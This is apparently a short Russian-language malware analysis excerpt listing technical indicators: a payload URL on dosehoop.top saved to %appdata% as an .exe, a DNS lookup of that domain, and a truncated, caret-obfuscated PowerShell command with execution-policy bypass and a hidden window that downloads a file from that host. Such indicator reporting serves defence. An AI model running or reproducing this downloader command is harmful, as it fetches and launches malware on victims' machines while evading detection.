Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Ow^ErSh^ell.^ExE -^E^x^ecUTIONP^oL^I^Cy ^B^ypA^Ss^ -nopRoFILE^ -wiNDoWSTYLe ^h^id^D^eN^ (NEW-o^b^je^cT S^YstEM^.NE^T^.wE^b^CL^I^eN^t).D^OWnL^oA^DFi^L^E^('http://dosehoop.top/read...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "P^Ow^ErSh^ell.^ExE -^E^x^ecUTIONP^oL^I^Cy ^B^ypA^Ss^ -nopRoFILE^ -wiNDoWSTYLe ^h^id^D^eN^ (NEW-o^b^je^cT S^YstEM^.NE^T^.wE^b^CL^I^eN^t).D^OWnL^oA^DFi^L^E^('http://dosehoop.top/read...' (со скрытым окном)